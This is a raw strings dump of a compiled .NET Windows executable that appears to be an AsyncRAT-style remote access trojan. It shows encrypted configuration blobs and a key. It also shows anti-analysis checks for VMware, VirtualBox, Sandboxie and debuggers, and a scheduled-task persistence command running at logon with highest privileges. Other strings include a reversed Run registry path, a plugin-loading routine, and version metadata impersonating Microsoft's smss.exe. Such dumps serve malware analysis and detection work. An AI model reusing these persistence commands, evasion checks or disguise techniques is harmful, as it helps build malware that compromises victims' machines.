!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<>p__0
IEnumerable`1
CallSite`1
List`1
__StaticArrayInitTypeSize=32
Microsoft.Win32
ToUInt32
ToInt32
SwapInt32
<>o__2
X509Certificate2
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
ToUInt16
ToInt16
SwapInt16
HMACSHA256
Sha256
Aes256
aes256
__StaticArrayInitTypeSize=6
get_UTF8
<Module>
MessagePackLib.<PrivateImplementationDetails>
1DB2A1F9902B35F8F880EF1692CE9947A193D5A698D8F568BDA721658ED4C58B
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
get_FormatID
EXECUTION_STATE
87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8F
get_ASCII
System.IO
ES_CONTINUOUS
get_IV
set_IV
GenerateIV
value__
ReadServertData
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
EndRead
BeginRead
Thread
InnerAdd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
Received
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
Append
RegistryValueKind
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
utf8Encode
DeleteSubKeyTree
get_Message
DetectSandboxie
Invoke
IEnumerable
IDisposable
ToDouble
SwapDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
WriteSingle
ToSingle
SetAsSingle
InstallFile
DecodeFromFile
SaveBytesToFile
IsInRole
WindowsBuiltInRole
GetActiveWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
lpModuleName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
get_UserName
lowerName
SetName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
valueType
MsgPackType
ProtocolType
GetType
SocketType
FileShare
System.Core
Serversignature
Dispose
StrReverse
X509Certificate
ValidateServerCertificate
certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
innerValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
asyns.exe
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
IndexOf
strFlag
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
ComputeHash
strToHash
GetHash
VerifyHash
get_ExecutablePath
GetTempPath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
msgpackObj
listObj
MessagePackLib.MessagePack
MsgPack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
unpack_msgpack
RegistryKeyPermissionCheck
FlushFinalBlock
IsSmallDisk
strVal
RtlSetProcessIsCritical
ProcessCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
Client.Install
kernel32.dll
user32.dll
ntdll.dll
WriteNull
SetAsNull
MutexControl
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
Program
get_Item
get_Is64BitOperatingSystem
Client.Algorithm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
MsgPackEnum
WriteBoolean
ToBoolean
SetAsBoolean
HwidGen
children
X509Chain
AppDomain
get_CurrentDomain
Pastebin
IsAdmin
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
Client.Connection
set_Position
position
CryptographicException
ArgumentNullException
ArgumentException
Unknown
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
WriteMap
PreventSleep
currentApp
Microsoft.CSharp
NormalStartup
System.Linq
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
InstallFolder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
get_Buffer
set_Buffer
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
DetectDebugger
ManagementObjectSearcher
SessionEndingEventHandler
Client.Helper
ToUpper
DetectManufacturer
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
NativeMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
Strings
InitializeSettings
SessionEndingEventArgs
Anti_Analysis
RunAntiAnalysis
ICredentials
set_Credentials
Equals
SslProtocols
ReadTools
WriteTools
BytesTools
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
sslPolicyErrors
FileAccess
hProcess
GetCurrentProcess
IPAddress
Compress
Decompress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Antivirus
Concat
ImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ForcePathObject
Collect
Connect
Reconnect
System.Net
Target
Client.Handle_Packet
KeepAlivePacket
ClientSocket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
ClientOnExit
IAsyncResult
ToUpperInvariant
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
isDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
CloseMutex
CreateMutex
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
_authKey
masterKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
WriteBinary
ToBinary
get_SystemDirectory
SetRegistry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
SHA256
pQMM9XhUx3ef8ZscF2qDLKeyyZrnPeAxOnTeoaDlJKRD8s20/JEikXgnoeJ+cpu3IYAx5uruJSGGgM6qWTyX/w==
x38JY4QlC+M8YYnI21R0lSmvSuVhpDrDDMOXqNOiwsuPEAykbWHuXfw5SbLEVTZmojPT0rG+IJkcRdA5vTXJPA==
I6bI8A9X4WgvY4moKGBfl3Q9+EBGbHT0Tb/YVsbTHIc3dUuOJWF7eV/YD5VHyPrPl9dPL8LLJtLHDry/ndLJ4A==
gxmLBIFSzIDyl+36AMgkWsgrMVuqIortHgK0vuarf+rpusrjNl63qOTMTpkOvSpBDk0zXe5kYgwDlBg25Exs3Q==
%AppData%
service.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Windows
FileVersion
6.3.9600.17031
InternalName
smss.exe
LegalCopyright
LegalTrademarks
OriginalFilename
smss.exe
ProductName
Microsoft
Windows
ProductVersion
6.3.9600.17031
Assembly Version
6.3.9600.17031